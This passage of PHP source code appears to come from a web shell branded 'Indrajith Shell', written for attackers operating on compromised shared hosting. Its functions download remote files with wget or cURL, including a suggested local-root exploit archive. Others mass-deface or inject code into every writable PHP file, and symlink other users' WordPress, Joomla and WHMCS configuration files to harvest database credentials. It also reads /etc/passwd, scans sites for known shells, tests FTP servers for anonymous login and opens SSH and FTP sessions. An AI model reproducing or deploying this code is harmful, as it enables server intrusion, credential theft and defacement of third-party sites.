  1470. echo "<tr><td style='text-align:left'>Useful : <br /><font color=7171C6><pre>";
  1471. echo implode(', ',$uze);
  1472. echo "</pre></td></tr>";
  1473. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  1474. $uze=array();
  1475. foreach($downloaders as $downloader)
  1476. {
  1477. if(cmd("which $downloader"))
  1478. {
  1479. $uze[]=$downloader;
  1480. }
  1481. }
  1482. echo "<tr><td style='text-align:left'>Downloaders : <br /><font color=7171C6><pre>";
  1483. echo implode(', ',$uze);
  1484. echo "</pre></td></tr>";
  1485. echo "<tr><td style='text-align:left'>Users : <br /><font color=7171C6><pre>".wordwrap(get_users())."</pre</font>></td></tr>
  1486. <tr><td style='text-align:left'>Hosts : <br /><font color=7171C6><pre>".cmd('cat /etc/hosts')."</pre></font></td></tr>";
  1487. }
  1488. echo "</table><br /><br /><hr /><br /><br />";
  1489. }
  1490.  
  1491. function remote_file_check_ui()
  1492. {
  1493. echo "<div id=result><center><h2>Remote File Check</h2><hr /><br /><br />
  1494. <table class=tbl><form method='POST'><tr><td>URL : <input size=50 name='rem_web' value='http://www.ajithkp560.hostei.com/php/'></td></tr>
  1495. <tr><td><font color=red>Input File's Names in TextArea</font></tr></td><tr><td><textarea spellcheck='false' class='textarea_edit' cols=50 rows=30 name='tryzzz'>indrajith.php
  1496. ajithkp560.php
  1497. index.html
  1498. profile.php
  1499. c99.php
  1500. r57.php</textarea></td></tr>
  1501. <tr><td><br /><input type='submit' value=' >> ' class='input_big' /><br /><br /></td></tr></form></table><br /><br /><hr /><br /><br />";
  1502. }
  1503.  
  1504. function remote_file_check_bg()
  1505. {
  1506. set_time_limit(0);
  1507. $rtr=array();
  1508. echo "<div id=result><center><h2>Scanner Report</h2><hr /><br /><br /><table class=tbl>";
  1509. $webz=$_POST['rem_web'];
  1510. $uri_in=$_POST['tryzzz'];
  1511. $r_xuri = trim($uri_in);
  1512. $r_xuri=explode("\n", $r_xuri);
  1513. foreach($r_xuri as $rty)
  1514. {
  1515. $urlzzx=$webz.$rty;
  1516. if(function_exists('curl_init'))
  1517. {
  1518. echo "<tr><td style='text-align:left'><font color=orange>Checking : </font> <font color=7171C6> $urlzzx </font></td>";
  1519. $ch = curl_init($urlzzx);
  1520. curl_setopt($ch, CURLOPT_NOBODY, true);
  1521. curl_exec($ch);
  1522. $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
  1523. curl_close($ch);
  1524. if($status_code==200)
  1525. {
  1526. echo "<td style='text-align:left'><font color=green> Found....</font></td></tr>";
  1527. }
  1528. else
  1529. {
  1530. echo "<td style='text-align:left'><font color=red>Not Found...</font></td></tr>";
  1531. }
  1532. }
  1533. else
  1534. {
  1535. echo "<font color=red>cURL Not Found </font>";
  1536. break;
  1537. }
  1538. }
  1539. echo "</table><br /><br /><hr /><br /><br /></div>";
  1540. }
  1541.  
  1542. function remote_download_ui()
  1543. {
  1544. echo "<div id=result><center><h2>Remote File Download</h2><hr /><br /><br /><table class=tbl><form method='GET'><input type=hidden name='path' value=".getcwd()."><tr><td><select style='color:green; background-color:black; border:1px solid #666;' name='type_r_down'><option>WGET</option><option>cURL</option></select></td></tr>
  1545. <tr><td>URL <input size=50 name='rurlfile' value='ajithkp560.hostei.com/localroot/2.6.x/h00lyshit.zip'></td></tr>
  1546. <tr><td><input type='submit' class='input_big' value=' >> ' /></td></tr></form></table><br /><br /><hr /><br /><br /></div>";
  1547. }
  1548.  
  1549. function remote_download_bg()
  1550. {
  1551. chdir($_GET['path']);
  1552. global $os;
  1553. $opt=$_GET['type_r_down'];
  1554. $rt_ffile=$_GET['rurlfile'];
  1555. $name=basename($rt_ffile);
  1556. echo "<div id=result>";
  1557. switch($opt)
  1558. {
  1559. case "WGET":
  1560. if($os!='win')
  1561. {
  1562. cmd("wget $rt_ffile");
  1563. alert("Downloaded Successfully...");
  1564. }
  1565. else
  1566. {
  1567. alert("Its Windows OS... WGET is not available");
  1568. }
  1569. break;
  1570. case "cURL":
  1571. if(function_exists('curl_init'))
  1572. {
  1573. $ch = curl_init($rt_ffile);
  1574. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1575. $data = curl_exec($ch);
  1576. curl_close($ch);
  1577. file_put_contents($name, $data);
  1578. alert("Download succeeded");
  1579. }
  1580. else
  1581. {
  1582. alert("cURL Not Available");
  1583. }
  1584. break;
  1585. }
  1586. echo "</div>";
  1587. }
  1588.  
  1589. function hex_encode_ui()
  1590. {
  1591. if(isset($_REQUEST['hexinp']) && isset($_REQUEST['tyxxx']))
  1592. {
  1593. $tyx=$_POST['tyxxx'];
  1594. $rezultzz=$_POST['hexinp'];
  1595. switch($tyx)
  1596. {
  1597. case "Encode":
  1598. $rzul=PREG_REPLACE("'(.)'e","dechex(ord('\\1'))",$rezultzz);
  1599. echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />
  1600. <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>$rzul</textarea>
  1601. <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>
  1602. Input : <input name='hexinp' size=50 value='input here'><input type=submit value=' >> ' /><br /><br /><hr /><br /><br /></div>";
  1603. break;
  1604. case "Decode":
  1605. $rzul=PREG_REPLACE("'([\S,\d]{2})'e","chr(hexdec('\\1'))",$rezultzz);
  1606. echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />
  1607. <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>$rzul</textarea>
  1608. <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>
  1609. Input : <input name='hexinp' size=50 value='input here'><input type=submit value=' >> ' /><br /><br /><hr /><br /><br /></div>";
  1610. break;
  1611. }
  1612. }
  1613. else
  1614. {
  1615. echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />
  1616. <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>Here visible Your Result</textarea>
  1617. <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>
  1618. Input : <input name='hexinp' size=50 value='input here'><input type=submit value=' >> ' /><br /><br /><hr /><br /><br /></div>";
  1619. }
  1620. }
  1621.  
  1622. function killme()
  1623. {
  1624. global $self;
  1625. echo "<div id=result><center><h2>Good Bye Dear</h2><hr />Dear, Good by... :( Hope You Like me...<br /><br /><br/><hr /><br /><br />";
  1626. $me=basename($self);
  1627. unlink($me);
  1628. }
  1629.  
  1630. function ftp_anonymous_ui()
  1631. {
  1632. echo "<div id='result'><center><h2>Anonymous FTP Scanner</h2><hr /></center><table class=tbl><form method='GET'><tr><td><textarea name='ftp_anonz' cols=40 rows=25 class='textarea_edit'>127.0.0.1
  1633. ftp.google.com
  1634. ftp.r00t.com
  1635. ftp.ajithkp.org
  1636. ...
  1637. ...</textarea></td></tr><tr><td><input class='input_big' type='submit' value=' >> ' /></td></tr></form></table><br /><br /><hr /><br /><br />";
  1638. }
  1639.  
  1640. function ftp_anonymous_bg()
  1641. {
  1642. echo "<div id=result><center><h2>Result</h2></center><hr /><br /><br /><table class=table>";
  1643. $ftp_list=$_GET['ftp_anonz'];
  1644. $xftpl = trim($ftp_list);
  1645. $xftpl = explode("\n", $xftpl);
  1646. foreach($xftpl as $xftp)
  1647. {
  1648. $xftp = str_replace("ftp://", "", $xftp);
  1649. $conn_ftp = ftp_connect($xftp);
  1650. $success = ftp_login($conn_ftp, "anonymous", "");
  1651. if($success)
  1652. {
  1653. echo "<tr><td><font color=7171C6>$xftp</font></td><td><font color=green>Successfull</font></td></tr>";
  1654. }
  1655. else
  1656. {
  1657. echo "<tr><td><font color=7171C6>$xftp</font></td><td><font color=red>Failed</font></td></tr>";
  1658. }
  1659.  
  1660. }
  1661. echo "</table><br /><br /><hr /><br /><br />";
  1662. }
  1663.  
  1664. function mass_deface_ui()
  1665. {
  1666. echo "<div id=result><center><h2>Mass Deface</h2><hr /><br /><br /><table class=tbl><form method='GET'><input name='mm_path' type='hidden' value=".$_GET['path']."><tr><td>Name : <input size=40 name='mass_name'></td></tr>
  1667. <tr><td><textarea name='mass_cont' cols=80 rows=25 class='textarea_edit'></textarea></td></tr><tr><td><input class='input_big' type=submit value=' >> ' /></td></tr></form></table><br /><br /><hr /><br /><br /></div>";
  1668. }
  1669.  
  1670. function mass_deface_bg()
  1671. {
  1672. global $sep;
  1673. $d_path=$_GET['mm_path'];
  1674. chdir($d_path);
  1675. $d_file=$_GET['mass_name'];
  1676. $d_conten=$_GET['mass_cont'];
  1677. if(is_dir($d_path))
  1678. {
  1679. chdir($d_path);
  1680. $d_dirs=array();
  1681. if($handle=opendir($d_path))
  1682. {
  1683. while(($item=readdir($handle))!==FALSE)
  1684. {
  1685. if($item=="."){continue;}
  1686. if($item==".."){continue;}
  1687. if(is_dir($item))
  1688. {
  1689. array_push($d_dirs, $item);
  1690. }
  1691. }
  1692. }
  1693. }
  1694. echo "<div id=result><center><h2>Result</h2></center><hr /><br /><br /><table class=tbl>";
  1695. foreach($d_dirs as $d_dir)
  1696. {
  1697. $xd_path=getcwd()."$sep$d_dir$sep$d_file";
  1698. if(is_writable($d_dir))
  1699. {
  1700. $handle=fopen($xd_path, "wb");
  1701. if($handle)
  1702. {
  1703. fwrite($handle, $d_conten);
  1704. }
  1705. }
  1706. echo "<tr><td><font color=green>$xd_path</font></td></tr>";
  1707. }
  1708. echo "</table><br /><br /><hr /><br /><br /></div>";
  1709. }
  1710.  
  1711.  
  1712. function symlinkg($usernamexx,$domainxx)
  1713. {
  1714. symlink('/home/'.$usernamexx.'/public_html/vb/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin1.txt');
  1715. symlink('/home/'.$usernamexx.'/public_html/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin2.txt');
  1716. symlink('/home/'.$usernamexx.'/public_html/forum/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin3.txt');
  1717. symlink('/home/'.$usernamexx.'/public_html/cc/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin4.txt');
  1718. symlink('/home/'.$usernamexx.'/public_html/inc/config.php','Indrajith/'.$domainxx.' =>mybb.txt');
  1719. symlink('/home/'.$usernamexx.'/public_html/config.php','Indrajith/'.$domainxx.' =>Phpbb1.txt');
  1720. symlink('/home/'.$usernamexx.'/public_html/forum/includes/config.php','Indrajith/'.$domainxx.' =>Phpbb2.txt');
  1721. symlink('/home/'.$usernamexx.'/public_html/wp-config.php','Indrajith/'.$domainxx.' =>Wordpress1.txt');
  1722. symlink('/home/'.$usernamexx.'/public_html/blog/wp-config.php','Indrajith/'.$domainxx.' =>Wordpress2.txt');
  1723. symlink('/home/'.$usernamexx.'/public_html/configuration.php','Indrajith/'.$domainxx.' =>Joomla1.txt');
  1724. symlink('/home/'.$usernamexx.'/public_html/blog/configuration.php','Indrajith/'.$domainxx.' =>Joomla2.txt');
  1725. symlink('/home/'.$usernamexx.'/public_html/joomla/configuration.php','Indrajith/'.$domainxx.' =>Joomla3.txt');
  1726. symlink('/home/'.$usernamexx.'/public_html/whm/configuration.php','Indrajith/'.$domainxx.' =>Whm1.txt');
  1727. symlink('/home/'.$usernamexx.'/public_html/whmc/configuration.php','Indrajith/'.$domainxx.' =>Whm2.txt');
  1728. symlink('/home/'.$usernamexx.'/public_html/support/configuration.php','Indrajith/'.$domainxx.' =>Whm3.txt');
  1729. symlink('/home/'.$usernamexx.'/public_html/client/configuration.php','Indrajith/'.$domainxx.' =>Whm4.txt');
  1730. symlink('/home/'.$usernamexx.'/public_html/billings/configuration.php','Indrajith/'.$domainxx.' =>Whm5.txt');
  1731. symlink('/home/'.$usernamexx.'/public_html/billing/configuration.php','Indrajith/'.$domainxx.' =>Whm6.txt');
  1732. symlink('/home/'.$usernamexx.'/public_html/clients/configuration.php','Indrajith/'.$domainxx.' =>Whm7.txt');
  1733. symlink('/home/'.$usernamexx.'/public_html/whmcs/configuration.php','Indrajith/'.$domainxx.' =>Whm8.txt');
  1734. symlink('/home/'.$usernamexx.'/public_html/order/configuration.php','Indrajith/'.$domainxx.' =>Whm9.txt');
  1735. symlink('/home/'.$usernamexx.'/public_html/admin/conf.php','Indrajith/'.$domainxx.' =>5.txt');
  1736. symlink('/home/'.$usernamexx.'/public_html/admin/config.php','Indrajith/'.$domainxx.' =>4.txt');
  1737. symlink('/home/'.$usernamexx.'/public_html/conf_global.php','Indrajith/'.$domainxx.' =>invisio.txt');
  1738. symlink('/home/'.$usernamexx.'/public_html/include/db.php','Indrajith/'.$domainxx.' =>7.txt');
  1739. symlink('/home/'.$usernamexx.'/public_html/connect.php','Indrajith/'.$domainxx.' =>8.txt');
  1740. symlink('/home/'.$usernamexx.'/public_html/mk_conf.php','Indrajith/'.$domainxx.' =>mk-portale1.txt');
  1741. symlink('/home/'.$usernamexx.'/public_html/include/config.php','Indrajith/'.$domainxx.' =>12.txt');
  1742. symlink('/home/'.$usernamexx.'/public_html/settings.php','Indrajith/'.$domainxx.' =>Smf.txt');
  1743. symlink('/home/'.$usernamexx.'/public_html/includes/functions.php','Indrajith/'.$domainxx.' =>phpbb3.txt');
  1744. symlink('/home/'.$usernamexx.'/public_html/include/db.php','Indrajith/'.$domainxx.' =>infinity.txt');
  1745. }
  1746.  
  1747. function config_grabber_bg()
  1748. {
  1749. global $sym_htaccess,$sym_php_ini;
  1750. mkdir('INDRAJITH', 0777);
  1751. symlink("/", "INDRAJITH/root");
  1752. $htaccess=fopen('INDRAJITH/.htaccess', 'wb');
  1753. fwrite($htaccess,$sym_htaccess);
  1754. $php_ini_x=fopen('INDRAJITH/php.ini', 'wb');
  1755. fwrite($php_ini_x, $sym_php_ini);
  1756. $usr=explode("\n",$_POST['user_z_list']);
  1757. foreach($usr as $uzer)
  1758. {
  1759. $u_er=trim($uzer);
  1760. symlinggg($u_er);
  1761. }
  1762. echo "<script>window.open('INDRAJITH/', '_blank');</script>";
  1763. alert('Config Grab compted. Check configs in direcory INDRAJITH');
  1764. }
  1765.  
  1766. if(isset($_POST['user_z_list']))
  1767. {
  1768. config_grabber_bg();
  1769. }
  1770.  
  1771.  
  1772. function config_grabber_ui()
  1773. {
  1774. if(file('/etc/passwd'))
  1775. {
  1776. ?><script>alert("/etc/named.conf Not Found, Its alternative method.");</script><div id=result><center><h2>Config Grabber</h2><hr /><br /><br /><table class=tbl><form method=POST><tr><td><textarea spellcheck=false class='textarea_edit' rows=15 cols=60 name=user_z_list><?php
  1777. $users = file('/etc/passwd');
  1778. foreach($users as $user)
  1779. {
  1780. $user = explode(':', $user);
  1781. echo $user[0]."\n";
  1782. }
  1783. ?></textarea></td></tr><tr><td><input type='submit' class='input_big' value=' >> '/></td></tr></form></table><br /><br /><hr /><br /><br /><hr /></div><?php
  1784. }
  1785. else
  1786. {
  1787. alert(" File Not Found : /etc/passwd ");
  1788. }
  1789. }
  1790.  
  1791. function symlinggg($user)
  1792. {
  1793. symlink('/home/'.$usernamexx.'/public_html/blog/configuration.php', "INDRAJITH/".$user." =>blog/configuration.php");
  1794. symlink('/home/'.$user.'/public_html/forum/includes/config.php', "INDRAJITH/".$user." =>forum/includes/config.php");
  1795. symlink("/home/".$user."/public_html/wp-config.php", "INDRAJITH/".$user." =>wp-config.php");
  1796. symlink("/home/".$user."/public_html/wordpress/wp-config.php", "INDRAJITH/".$user." =>wordpress/wp-config.php");
  1797. symlink("/home/".$user."/public_html/configuration.php", "INDRAJITH/".$user." =>configuration.php");
  1798. symlink("/home/".$user."/public_html/blog/wp-config.php", "INDRAJITH/".$user." =>blog/wp-config.php");
  1799. symlink("/home/".$user."/public_html/joomla/configuration.php", "INDRAJITH/".$user." =>joomla/configuration.php");
  1800. symlink("/home/".$user."/public_html/vb/includes/config.php", "INDRAJITH/".$user." =>vb/includes/config.php");
  1801. symlink("/home/".$user."/public_html/includes/config.php", "INDRAJITH/".$user." =>includes/config.php");
  1802. symlink("/home/".$user."/public_html/conf_global.php", "INDRAJITH/".$user." =>conf_global.php");
  1803. symlink("/home/".$user."/public_html/inc/config.php", "INDRAJITH/".$user." =>inc/config.php");
  1804. symlink("/home/".$user."/public_html/config.php", "INDRAJITH/".$user." =>config.php");
  1805. symlink("/home/".$user."/public_html/Settings.php", "INDRAJITH/".$user." =>/Settings.php");
  1806. symlink("/home/".$user."/public_html/sites/default/settings.php", "INDRAJITH/".$user." =>sites/default/settings.php");
  1807. symlink("/home/".$user."/public_html/whm/configuration.php", "INDRAJITH/".$user." =>whm/configuration.php");
  1808. symlink("/home/".$user."/public_html/whmcs/configuration.php", "INDRAJITH/".$user." =>whmcs/configuration.php");
  1809. symlink("/home/".$user."/public_html/support/configuration.php", "INDRAJITH/".$user." =>support/configuration.php");
  1810. symlink("/home/".$user."/public_html/whmc/WHM/configuration.php", "INDRAJITH/".$user." =>whmc/WHM/configuration.php");
  1811. symlink("/home/".$user."/public_html/whm/WHMCS/configuration.php", "INDRAJITH/".$user." =>whm/WHMCS/configuration.php");
  1812. symlink("/home/".$user."/public_html/whm/whmcs/configuration.php", "INDRAJITH/".$user." =>whm/whmcs/configuration.php");
  1813. symlink("/home/".$user."/public_html/support/configuration.php", "INDRAJITH/".$user." =>support/configuration.php");
  1814. symlink("/home/".$user."/public_html/clients/configuration.php", "INDRAJITH/".$user." =>clients/configuration.php");
  1815. symlink("/home/".$user."/public_html/client/configuration.php", "INDRAJITH/".$user." =>client/configuration.php");
  1816. symlink("/home/".$user."/public_html/clientes/configuration.php", "INDRAJITH/".$user." =>clientes/configuration.php");
  1817. symlink("/home/".$user."/public_html/cliente/configuration.php", "INDRAJITH/".$user." =>cliente/configuration.php");
  1818. symlink("/home/".$user."/public_html/clientsupport/configuration.php", "INDRAJITH/".$user." =>clientsupport/configuration.php");
  1819. symlink("/home/".$user."/public_html/billing/configuration.php", "INDRAJITH/".$user." =>billing/configuration.php");
  1820. symlink("/home/".$user."/public_html/admin/config.php", "INDRAJITH/".$user." =>admin/config.php");
  1821. }
  1822.  
  1823. function sym_xxx()
  1824. {
  1825. global $sym_htaccess,$sym_php_ini;
  1826. mkdir('Indrajith', 0777);
  1827. symlink("/", "Indrajith/root");
  1828. $htaccess=@fopen('Indrajith/.htaccess', 'w');
  1829. fwrite($htaccess,$sym_htaccess);
  1830. $php_ini_x=fopen('Indrajith/php.ini', 'w');
  1831. fwrite($php_ini_x, $sym_php_ini);
  1832. $akps = implode(file("/etc/named.conf"));
  1833. if(!$akps)
  1834. {
  1835. config_grabber_ui();
  1836. }
  1837. else
  1838. {
  1839. $usrd = array();
  1840. foreach($akps as $akp)
  1841. {
  1842. if(eregi("zone", $akp))
  1843. {
  1844. preg_match_all('#zone "(.*)" #', $akp, $akpzz);
  1845. flush();
  1846. if(strlen(trim($akpzz[1][0]))>2)
  1847. {
  1848. $user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0]));
  1849. symlinkg($akpzz[1][0],$user['name']);
  1850. flush();
  1851. }
  1852. }
  1853. }
  1854. }
  1855. }
  1856.  
  1857. function sym_link()
  1858. {
  1859. global $sym_htaccess,$sym_php_ini;
  1860. cmd('rm -rf AKP');
  1861. mkdir('AKP', 0755);
  1862. $usrd = array();
  1863. $akps = implode(file("/etc/named.conf"));
  1864. $htaccess=fopen('AKP/.htaccess', 'w');
  1865. fwrite($htaccess,$sym_htaccess);
  1866. $php_ini_x=fopen('AKP/php.ini', 'w');
  1867. fwrite($php_ini_x, $sym_php_ini);
  1868. symlink("/", "AKP/root");
  1869. if(!$file)
  1870. {
  1871. echo "<script>alert('Bind File /etc/passwd Not Found. Its alternative Method')</script>";
  1872. echo "<div id=result><center><h2>SymLink</h2></center><hr /><br /><br /><table class='table'><tr><th>Users</th><th>Exploit</th></tr>";
  1873. $users = file('/etc/passwd');
  1874. foreach($users as $user)
  1875. {
  1876. $user = explode(':', $user);
  1877. echo "<tr><td>".$user[0]."</td><td><a href='AKP/root/home/".$user[0]."/public_html/' target=_blank>SymLink</tr>";
  1878. }
  1879. echo "</table><br /><br /><hr /><br /><br /></div>";
  1880.  
  1881. }
  1882. else
  1883. {
  1884. echo "<table class=table><tr><td>Domains</td><td>Users</td><td>Exploit</font></td></tr>";
  1885. foreach($akps as $akp)
  1886. {
  1887. if(eregi("zone", $akp))
  1888. {
  1889. preg_match_all('#zone "(.*)" #', $akp, $akpzz);
  1890. flush();
  1891. if(strlen(trim($akpzz[1][0]))>2)
  1892. {
  1893. $user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0]));
  1894. echo "<tr><td><a href=http://www.".$akpzz[1][0]." target=_blank>".$akpzz[1][0]."</a><td>".$user['name']."</td><td><a href='AKP/root/home/".$user['name']."/public_html/' target=_blank>SymLink</a></td></tr></table>";
  1895. flush();
  1896. }
  1897. }
  1898. }
  1899. }
  1900. }
  1901.  
  1902. function shell_finder_ui()
  1903. {
  1904. echo "<div id=result><center><h2>SH3LL SCANNER</h2><hr /><br /><br /><br /><form method='GET'>URL : <input size=50 name='sh311_scanx' value='http://www.ajithkp560.hostei.com/PHP/'><input type='submit' value=' >> ' /></form><br /><br /><hr /><br /><br />";
  1905. }
  1906.  
  1907. function shell_finder_bg()
  1908. {
  1909. $sh_url=$_GET['sh311_scanx'];
  1910. echo "<div id=result><center><h2>SHELL SCAN</h2><hr /><br /><br /><table class='table'>";
  1911. $ShellZ=array("indrajith.php", "c99.php", "c100.php","r57.php", "b374k.php", "c22.php", "sym.php", "symlink_sa.php", "r00t.php", "webr00t.php", "sql.php","cpanel.php", "wso.php", "404.php", "aarya.php", "greenshell.php", "ddos.php", "madspot.php", "1337.php", "31337.php", "WSO.php", "dz.php", "cpn.php", "sh3ll.php", "mysql.php", "killer.php", "cgishell.pl", "dz0.php", "whcms.php", "vb.php", "gaza.php", "d0mains.php", "changeall.php", "h4x0r.php", "L3b.php", "uploads.php", "shell.asp", "cmd.asp", "sh3ll.asp", "b374k-2.2.php", "m1n1.php", "b374km1n1.php");
  1912. foreach($ShellZ as $shell)
  1913. {
  1914. $urlzzx=$sh_url.$shell;
  1915. if(function_exists('curl_init'))
  1916. {
  1917. echo "<tr><td style='text-align:left'><font color=orange>Checking : </font> <font color=7171C6> $urlzzx </font></td>";
  1918. $ch = curl_init($urlzzx);
  1919. curl_setopt($ch, CURLOPT_NOBODY, true);
  1920. curl_exec($ch);
  1921. $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
  1922. curl_close($ch);
  1923. if($status_code==200)
  1924. {
  1925. echo "<td style='text-align:left'><font color=green> Found....</font></td></tr>";
  1926. }
  1927. else
  1928. {
  1929. echo "<td style='text-align:left'><font color=red>Not Found...</font></td></tr>";
  1930. }
  1931. }
  1932. else
  1933. {
  1934. echo "<font color=red>cURL Not Found </font>";
  1935. break;
  1936. }
  1937. }
  1938. echo "</table><br /><br /><hr /><br /><br /></div>";
  1939. }
  1940.  
  1941. function code_in_ui()
  1942. {
  1943. global $sep;
  1944. $mode=$_POST['modexxx'];
  1945. $ftype=$_POST['ffttype'];
  1946. $c_cont=$_POST['code_cont'];
  1947. $ppp=$_POST['path'];
  1948. if(isset($_POST['modexxx']) && isset($_POST['path']) && isset($_POST['ffttype']) && isset($_POST['code_cont']) && $mode!="" && $ftype!="" && $c_cont!="" && $ppp!="")
  1949. {
  1950. echo "<div id=result><center><h2>Successfully c0d3 inj3cted</h2></center><table class=tbl>";
  1951. switch($mode)
  1952. {
  1953. case "Apender":
  1954. $mmode="a";
  1955. break;
  1956. case "Rewrite":
  1957. $mmode="w";
  1958. break;
  1959. }
  1960. if($handle = opendir($ppp))
  1961. {
  1962. while(($c_file = readdir($handle)) !== False)
  1963. {
  1964. if((preg_match("/$ftype".'$'.'/', $c_file , $matches) != 0) && (preg_match('/'.$c_file.'$/', $self , $matches) != 1))
  1965. {
  1966. echo "<tr><td><font color=red>$ppp$sep$c_file</font></td></tr>";
  1967. $fd = fopen($ppp.$sep.$c_file,$mmode);
  1968. if($fd)
  1969. {
  1970. fwrite($fd,$c_cont);
  1971. }
  1972. else
  1973. {
  1974. alert("Error. Access Denied");
  1975. }
  1976. }
  1977. }
  1978. }
  1979. echo "</table><br /><br /><hr /><br /><br /></div>";
  1980. }
  1981. else
  1982. {
  1983. ?>
  1984. <div id=result><center><h2>c0de inj3ct</h2></center><hr /><br /><br /><table class=table><form method='POST'><input type='hidden' name='path' value="<?php echo getcwd(); ?>"><tr><td>Mode : </td>
  1985. <td><select style='color:green; background-color:black; border:1px solid #666;' name='modexxx'><option>Apender</option><option>Rewrite</option></select></td></tr><tr><td>File Type</td><td><input name='ffttype' value='.php' size=50></td></tr>
  1986. <tr><td>Content : </td><td><textarea name='code_cont' rows=20 cols=60 class='textarea_edit'></textarea></td></tr><tr><td></td><td><input type=submit value=' >> ' class='input_big' /></td></tr></form></table><br /><br /><hr /><br /><br />
  1987. <?php
  1988. }
  1989. }
  1990.  
  1991. function ssh_man_ui()
  1992. {
  1993. ?>
  1994. <div id=result><center><h2>SSH Manager</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td>HOST : </td><td><input size=50 name='ssh_host'></td></tr><tr><td>Username : </td><td><input size=50 name='ssh_user'></td></tr><tr><td>Password : </td><td><input size=50 name='ssh_pass'></td></tr><tr><td></td><td><input type='submit' value=' >> ' /></form></table></center><br /><br /><hr /><br /><br /></div>
  1995. <?php
  1996. }
  1997.  
  1998. function ssh_man_bg()
  1999. {
  2000. $ssh_h=$_GET['ssh_host'];
  2001. $ssh_u=$_GET['ssh_user'];
  2002. $ssh_p=$_GET['ssh_pass'];
  2003. if(!function_exists('ssh2_connect'))
  2004. {
  2005. alert("Sorry, Function ssh2_connect is not found");
  2006. }
  2007. $conn=ssh2_connect($ssh_h, 22);
  2008. if(!$conn)
  2009. {
  2010. alert("SSH Host Not Found");
  2011. }
  2012. $log=ssh2_auth_password($conn, $ssh_u, $ssh_p);
  2013. if(!$log)
  2014. {
  2015. alert("SSH Authorication failed");
  2016. }
  2017. $shell=ssh2_shell($conn, "bash");
  2018. if($_GET['ssh_cmd']!="" && $_GET['ssh_cmd'])
  2019. {
  2020. $ssh_cmd=$_GET['ssh_cmd'];
  2021. fwrite($shell, $ssh_cmd);
  2022. sleep(1);
  2023. while($line=fgets($shell))
  2024. {
  2025. flush();
  2026. echo $line."\n";
  2027. }
  2028. ?>
  2029. <div id=result><center><h2>SSH Shell by Indrajith Shell</h2><hr /><br /><br /><textarea class='textarea_edit' rows=20 cols=60></textarea>
  2030. <form method='GET'>CMD : <input name='ssh_cmd' size=60><input type='submit' value=' >> ' /></form></center><br /><br /><hr /><br /><br /></div>
  2031. <?php
  2032. }
  2033. else
  2034. {
  2035. ?>
  2036. <div id=result><center><h2>SSH Shell by Indrajith Shell</h2><hr /><br /><br /><textarea class='textarea_edit' rows=20 cols=60></textarea>
  2037. <form method='GET'>CMD : <input name='ssh_cmd' size=60><input type='submit' value=' >> ' /></form></center><br /><br /><hr /><br /><br /></div>
  2038. <?php
  2039. }
  2040. }
  2041.  
  2042. function ftp_man_ui()
  2043. {
  2044. ?>
  2045. <div id=result><center><h2>FTP Manager</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td>HOST : </td><td><input size=50 name='ftp_host'></td></tr>
  2046. <tr><td>Username : </td><td><input size=50 name='ftp_user'></td></tr>
  2047. <tr><td>Password : </td><td><input size=50 name='ftp_pass'></td></tr>
  2048. <tr><td>Path [<font color=red>Optional</font>] : </td><td><input name='fpath' size=50></td></tr>
  2049. <tr><td>Upload File From Server [<font color=red>Optional</font>] : </td><td><input name='upload_file' size=50></td></tr>
  2050. <tr><td>Download File To Server [<font color=red>Optional</font>] : </td><td><input name='download_file' size=50></td></tr>
  2051. <tr><td></td><td><input type='submit' value=' >> ' /></form></table></center><br /><br /><hr /><br /><br /></div>
  2052. <?php
  2053. }
  2054.  
  2055. function ftp_man_bg()
  2056. {
  2057. echo "<div id=result><center><h2>FTP FILEMANAGER</h2></center><hr />";
  2058. $fhost=$_GET['ftp_host'];
  2059. $fuser=$_GET['ftp_user'];
  2060. $fpass=$_GET['ftp_pass'];
  2061. $fpath=$_GET['fpath'];
  2062. $upl=$_GET['upload_file'];
  2063. $down=$_GET['download_file'];
  2064. if($fpath=="")
  2065. {
  2066. $fpath=ftp_pwd($conn);
  2067. }
  2068. $conn=ftp_connect($fhost);
  2069. if(!$conn)
  2070. {
  2071. alert("FTP Host Not Found!!!");
  2072. }
  2073. $log=ftp_login($conn, $fuser, $fpass);
  2074. if(!$log)
  2075. {
  2076. alert("FTP Authorication Failed");
  2077. }
  2078. if($upl!="")
  2079. {
  2080. $fp = fopen($upl, 'r');
  2081. if (ftp_fput($conn, $upl, $fp, FTP_ASCII))
  2082. {
  2083. echo "<center><font color=green>Successfully uploaded <font color=red> $upl </font> </font></center>";
  2084. }
  2085. else
  2086. {
  2087. echo "<center><font color=red>There was a problem while uploading <font color=green> $upl </font> </font></center>";
  2088. }
  2089. }
  2090. if($down!="")
  2091. {
  2092. $handle = fopen($down, 'w');
  2093. if (ftp_fget($conn, $handle, $down, FTP_ASCII, 0))
  2094. {
  2095. echo "<center><font color=green>successfully written to <font color=red> $down </font> </font></center>";
  2096. }
  2097. else
  2098. {
  2099. echo "<center><font color=red>There was a problem while downloading <font color=green> $down </font> to <font color=green> $down </font> </font></center>";
  2100. }
  2101. }
  2102. echo "<table class='table'><tr><th>Files</th>";
  2103. ftp_chdir($fpath);
  2104. $list=ftp_rawlist($conn, $fpath);
  2105. foreach($list as $fff)
  2106. {
  2107. echo "<tr><td><pre>$fff</pre></td></tr>";
  2108. }
